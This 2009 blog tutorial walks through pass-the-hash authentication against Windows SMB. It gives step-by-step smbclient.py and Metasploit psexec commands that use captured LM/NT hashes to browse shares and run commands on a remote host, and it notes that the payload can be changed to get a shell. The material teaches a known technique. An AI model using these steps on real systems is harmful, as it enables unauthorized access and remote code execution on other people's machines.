Thursday, November 26, 2009

Pass-the-Hash, Who needs a password anyways...

Pass the hash refers to a method in which a user can authenticate with a system without using the plain-text password. What is used instead is what is known as the encrypted hash (your plain-text password is ran through a one way process or algorithm and the result is known as a password hash). In the passing the hash method, we would be using this hash to authenticate with the server. We can't just type in the hash into the password prompt and get it work if thats what you're assuming. We are gonna require some special tools to do the job for us as this method is not naturally supported by windows for obvious reasons. The tools im gonna demo is a modified version of smbclient, called smbclient.py written in python and found in Bactrack 4 and a metasploit module, psexec. This demo requires you to use your skills to obtain a these hashes(reasearch fgdump or pwdump).

[SMBCLIENT]
Enter the following commands for smbclient:
# python ./smbclient.py //Start the client
# open 10.0.0.2 139 //opens a SMB connection against host/port
# login_hash user1 your_lmhash your_nthash //logs into the smb session with user/hash combo. Note the space between both lm and the nt hash.
example: login_hash mary AAFF5441321GSGW566WT ERGBXHG4J65461DF564DHD
# Shares //list available shares
# use share_name //connects to a specific share

If all goes well and you are logged in, you can go up the file tree, download or upload files, delete files etc. For more commands just type 'help'.

[PSEXEC]
Enter the following commands for smbclient:
# ./msfconsole //Lauch the metasploit framework
msf> use exploit/windows/smb/psexec //select the psexec module to use as the exploit
msf exploit(psexec)>show options //list the options that are needed for the exploit to work
msf exploit(psexec)>set RHOST 10.0.0.2 //sets the targets IP
msf exploit(psexec)>set SMBUser admin //sets the username
msf exploit(psexec)>set SMBPass lm_hash:nt_hash //Sets the lm:nt hashes. Note that you need both seperated only by a ':'. Leave the rport at 445(139 wont work).
msf exploit(psexec)>set PAYLOAD windows/exec //sets your payload. Do show payloads for others
msf exploit(psexec)>set CMD calc.exe //sets the command to execute
msf exploit(psexec)>exploit //run the exploit

If all is well, calc.exe should have been executed on the remote system. Obviously you may want too do something more than just run calc like gain a shell. No problem, just set the required payload and the necessary options and you're good to go.

No comments:

Post a Comment